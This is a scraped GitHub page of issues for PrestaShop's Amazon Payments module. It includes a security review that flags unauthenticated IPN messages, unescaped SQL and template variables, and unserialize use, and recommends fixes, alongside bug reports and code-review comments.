prestashopcorp / amzpayments Goto Github PK

View Code? Open in Web Editor NEW

1.0 1.0 7.0 2.29 MB

Amazon Payments module

PHP 81.55% HTML 1.45% CSS 0.61% JavaScript 5.79% Smarty 10.60%

obsolete payment-module prestashop-module

amzpayments's People

Contributors

Stargazers

Watchers

Forkers

paeddl kleopatra999 vilchola data-twister lichesser isabella232

amzpayments's Issues

security review

We didn't check fully payment validation flow, we need testing credentials.

IPN security

https://github.com/PrestaShop/amzpayments/blob/dev/ipn.php#L51

It looks like there is no access control to ipn.php, everybody is able to submit a "PaymentAuthorize" message.

If ipn.php is meant to only receive notification from amazon merchant service/gateway, then the messages should be signed or authentified so we can be sure the message come from a trustable source and can't be altered.

SQL issue

https://github.com/PrestaShop/amzpayments/blob/dev/controllers/front/amzpayments.php#L404 escape $sql_arr variables with pSQL or (int) before db->insert()

https://github.com/PrestaShop/amzpayments/blob/dev/ipn.php#L59 pSQL((string) $response_xml->AuthorizationDetails->AuthorizationStatus->State)
https://github.com/PrestaShop/amzpayments/blob/dev/ipn.php#L81 pSQL((string) $response_xml->CaptureDetails->CaptureStatus->State)
https://github.com/PrestaShop/amzpayments/blob/dev/ipn.php#L101 pSQL((string) $response_xml->RefundDetails->RefundStatus->State)
https://github.com/PrestaShop/amzpayments/blob/dev/ipn.php#L114 pSQL((string) $response_xml->OrderReference->OrderReferenceStatus->State)

serialize / unserialize

Please replace all the following call of serialize/unserialize by json_encode/json_decode

If you can't, please use Tools::unSerialize() instead of unserialize()

https://github.com/PrestaShop/amzpayments/blob/dev/controllers/front/amzpayments.php#L648
https://github.com/PrestaShop/amzpayments/blob/dev/controllers/front/amzpayments.php#L657

smarty template escaping

In the following templates, the variables aren't escaped, it is recommanded to always escape the variable with |escape:'htmlall'

https://github.com/PrestaShop/amzpayments/blob/dev/views/templates/admin/configuration.tpl
https://github.com/PrestaShop/amzpayments/blob/dev/views/templates/admin/order_actions.tpl
https://github.com/PrestaShop/amzpayments/blob/dev/views/templates/admin/order_history.tpl
https://github.com/PrestaShop/amzpayments/blob/dev/views/templates/admin/order_summary.tpl
https://github.com/PrestaShop/amzpayments/blob/dev/views/templates/admin/skeleton.tpl

Front end comments

Back office

On the configuration page, your warning message is displayed even if I have the proper version (1.6.1.1 here). But be careful, the potential number of merchants using your module will be greatly limited if you keep this restriction of PrestaShop version.

Here is a suggestion if you want a solution for the older versions, which can replace hookActionCustomerLogoutAfter:

public function hookDisplayHeader($params)
{
    [...]

    if (version_compare(_PS_VERSION_, '1.6.1.1', <) // This test can even be removed if you want
        && isset($this->context->cookie->amz_access_token)
        && ! $this->context->customer->isLogged())
    {
        unset($this->context->cookie->amz_access_token);
        unset($this->context->cookie->amazon_id);
        unset($this->context->cookie->amz_js_string);
    }

    [...]
}

Front office

On this page, it would be great to have the whole button clickable, like we can do with the other payment options.

General comments after code review

Hi,

I have just checked the main class of the module and there are many points to fix:

In the install() function, do NOT alter core table, because it can bring some issues during PrestaShop upgrades. Please create another table for your columns, joined by the order id or customer id.
The HTML code must not be generated in the PHP files. In order to respect the MVC architecture, they must be moved in the tpl files. Your PHP code will be really lighter.
Even if the module is supposed to be published for only one country, it must be written in English. Then, you can translate it in your favorite languages with the translation fonctionnality of PrestaShop.

Because fixing these points will change a whole part of your code, I wait them to be fixed before going farther in the code review.
However, I'll make a functional test later.

Best regards

Notices on Payment page

Just before I can confirm an order, 2 notices appear on the page:

Popup with error

Module version: 2.0.57
Prestashop version: 1.6.1.11

Checkout button is deactivated, when force enabled, above enclosed warning appears. Customers cannot place orders.

List of open points that need to be clarified

We are facing the following issues:

We can not add a box with text and a "Login with Amazon"-Button to the authentication page, since there are no hooks available. However, to make this a convenient integration for merchants, we need this.
code optimization is changing the order of two JS snippets that normally should be in the header and must be in the right order. (This one might be fixed by Patrick) But anyway, how could we avoid this re-ordering?
We might get into trouble when jQuery in the shop is loaded before the Amazon Payments widgets.js, because then, those parts that need the jquery version which is loaded by the shop might not work correctly.
The module generates URLs that the merchants have to enter in their Amazon accounts to whitelist them. This URL contains the path to the module directory. While it's retrieved by means of using Prestashop-Methods, it also shows the path "modules" while in fact, the path "module" would be correct.
When uninstalling the old plugin, the overrides are not removed correclty, which causes errors when installing the new one afterwards.
Overrides are often not generated correctly, merchants have to delete the file class_index.php in the folder cache in order to redrive them.

Regards
Bernd.

Module already in Prestashop?

Is this the same module currently included in Prestashop?

I ran into an issue with that module not recording any transactions with Google Analytics (other payment modules do so fine), so I'm curious if this one is worth a try or if the Prestashop included one is the latest version of this.

Overrides

The module uses overrides but since it's a partner module it's forbidden.

why is jquery "hard" loaded again from cdn on every page?

In the hookDisplayHeader () method jquery 1.12 is being hardloaded again even though $this->context->controller->addJquery(); is being called right at the beginning of the function. Removing the string which loads jquery 1.12 results in "jQuery is not a function" errors and the button not appearing.

My issue with this is the unneccessary extra load time, especially since it is loaded on every page (i.e. landing pages on which speed matters and amazon pay does not need to be loaded at all) and the jquery cdn is unreliable (regarding speed...).

I realize i can exclude the module from header hook for index, category and product pages through the prestashop "positions" tool but would like a less "workaroundy" solution. Thanks for the otherwise great module!